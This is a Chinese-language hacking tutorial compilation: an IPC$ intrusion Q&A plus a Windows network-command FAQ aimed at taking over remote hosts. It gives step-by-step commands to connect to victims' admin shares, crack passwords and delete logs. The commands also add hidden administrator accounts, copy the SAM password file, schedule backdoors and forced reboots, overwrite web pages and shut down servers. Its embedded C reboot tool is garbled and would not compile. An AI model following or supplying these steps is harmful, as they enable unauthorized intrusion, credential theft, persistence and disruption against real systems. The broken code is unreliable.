IPC$连接常见问答

IPC$连接常见问答

十五 ipc$入侵问答精选
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。

2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。

3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。

4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或psexec.exe吧，用法上面有。

5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的操作只是在本地进行。

6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。

7.我用Win98能与对方建立ipc$连接吗？

答：理论上不可以，要进行ipc$的操作，建议用win2000，用其他操作系统会带来许多不必要的麻烦。

8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。　　

9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。

10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！

11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。

12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.

13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。

14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？

答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。

16.能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。

c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。

答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随之发生了错误5。

17.您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答：答案很简单，你的命令错了，应该是net time \\ip
没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip

如何查看本机所开端口(2)

发布日期：2005-12-27 0:38:18 作者：未知出处：互联网

16）如何再命令行下杀死对方进程？

利用微软的2K以上操作系统都是含有这个工具的！该工具包含在2K光盘的\support\tools文件夹下！里面有安装程序，点击后，就安装了2K的support tools工具包，里面有kill这个工具，这时候再cmd下可以输入kill/?，就可以看到帮助了，使用这个命令的格式是：kill pid （pid是进程的ID号！）再任务管理器中可以看到进程的ID号！（不知道有几位朋友用过蓝色火焰？呵呵，用法跟这个一摸一样！还有很多类似的木马、后门软件都有类似的功能！这个是windows自带的大木马『后门工具』而已！）

这时候，有朋友问了，那再命令行下如何查看进程呢？呵呵，这就用到了系统自带的有一个后门工具了：再刚才说得那个目录中，还有一个工具叫tlist 看名字就能看出来是干什么的吧？用法更简单！直接输入tlist就可以得到pid遇队形程序的列表了～

那对方机器如果没有安装这两个程序怎么办呢？没关系，你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了！呵呵～

×××××××××××××××××××××××××××××××××××××××××××××

17）上次说了ping的基本用法，这次谈谈ping的命令参数！

这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指掌么？恐怕都未必！还是好好看看吧！

这是TCP／IP协议中最有用的命令之一

它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。

Usage： ping ［-t］ ［-a］ ［-n count］［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
［-r count］ ［-s count］ ［［-j host-list］ ［-k host-list］］
［-w timeout］ destination-list

Options：

-t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去）

-a Resolve addresses to hostnames.（把IP转为主机名）

-n count Number of echo requests to send.（响应请求的数量）

-l size Send buffer size.（封包的大小）

-f Set Don`t Fragment flag in packet.（信息包中无碎片）

-i TTL Time To Live.（时间）

-v TOS Type Of Service.（服务类型）

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.（较严格的……唉，怎么译好……算了，放着吧）

-w timeout Timeout in milliseconds to wait for each reply.（timeout的时间）

比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。

其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。

×××××××××××××××××××××××××××××××××××××××××××××

18）如何查看本机的DNS服务器？

ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：再cmd下输入netsh，进入到netsh>提示符，再输入：int ip 进入到interface ip> 然后再次输入dump，这时候屏幕上出现当前连接的配置情况了

这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，所以这里只对部分命令进行讲解：

1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 之后：ip 回车 再之后：show address 回车这样，就可以看到当前连接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面）

2）修改网络配置：接着上面的命令，我们使用：set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address来看看（或者用ipconfig）

3）显示一个完整的网络配置教本：

刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，还是有自己的特色的！例如：再interface ip>状态下输入：dump，会显示一个清单，显示所有本地连接（不管你是否使用～）与netstat -an不完全一样！

这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！（要在netsh>提示符下才能查看帮助啊～）

19）肉鸡上的部分文件无法删除，怎么办？

如果对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面加上/f参数来删除！

20）再说一个可以限制用户登陆时间的命令！

再net命令中就可以实现这样的功能！具体方法如下：

假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆，用这个命令：

net user coldcrysky /timesunday-monday,08:00-16:00

之后利用net user coldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间（因为是中文的，很容易懂，我就不多废话了）

在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！

光说了怎么设置，如果想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆的状态）

看我的：net user coldcrysky /time:all --这样就可以了～

22)如何删除windows2K的默认贡献？

首先打开记事本，输入如下内容：

net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete

这里的c$、d$、e$……是代表默认共享的盘符～又几个就设置几个就可以了～

之后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就可以了～

23）139端口的又一用法

呵呵，写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点：1）不要利用本帖所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引玉的作用！

废话不多说了～开始：

如果你使用NT主机的话，那你可要注意了！
重启NT主机的方法如下：

1：Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接

2：net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘

3：copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件

4：net time \\XXX.XXX.XXX.XXX
得到对方机器时间

5：at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间！

6：at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务

7：等对方重启好了～

上面的第三步是only for Win2K的，如果是Nt，就需要用意个指定的重启程序，我们可以自己编写一个reboot.exe来代替reboot.bat，代码如下：
#include "stdio.h"
#include "windows.h"
int main()
{
file://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
file://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
file://因为上面的重启不成功，所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
file://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
file://判断是NT内核还是9X内核，选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;

对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP～呵呵

24）利用批处理文件来建立一个记录3389登陆者信息的记录器

由于Terminal Service默认是没有日志记录的，只能依靠他的系统日志，但是系统日志只能记录一些大动作（开启或停止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单：

建立一个批处理文件：内容如下：

@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389

之后保存！

如果有人用你的3389登陆你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有连接时间……资料～开始反击～呵呵

25）网络命令小节（最近因为新学HACK的朋友人数上涨了～所以把我的这个陈年老调又一次拿出来，因为是我刚来S8S8的时候就整理的了，所以可能会有些错误的地方，如果发现请帮忙指出！）--呵呵，第一个问题只对菜鸟有作用！如果你是高手或者是自认为高手的话，请从第二题看起！

A、NET命令：

IPC连接：格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接～』
net use \\对方IP\ipc$ /delete 『断开连接～』

以下操作需要在连接到对方主机后才可进行！！！

net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』

net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊！！！^_^』

net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』

B、AT命令：

查看远程机时间：net time \\对方IP

加入一项新任务：

at \\对方IP 时间 文件名『用来把自己上传的后门程序在制定时间运行，方便以后进入肉鸡！』

C、TELNET命令：

telnet 对方IP 端口『作用不用我说了吧？？？』

D、FTP命令：

登陆：ftp 对方网址（IP地址）
上传文件：get 文件在本机完整路径 对方文件存放完整路径
下载文件：put 对方文件完整路径 本机存放文件路径

E、COPY命令：

在建立连接后（尤其是IPC$连接后，很有用的命令哦～）
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下，如果要放到对方的NT目录下，则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令：

主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！

G、NBTSTAT命令：

nbtstat -A 对方IP （这个A大写）

『在其中显示<037>前面的英文或数字就是计算机名称！当然，也可以利用PING -A 对方ip的方法来查看对方主机名！效果相同！！！』

H、SHUTDOWN命令：

『用来关闭对方NT服务的命令』格式如下：
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』

I、DIR命令：

还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～）

J、ECHO命令：

echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』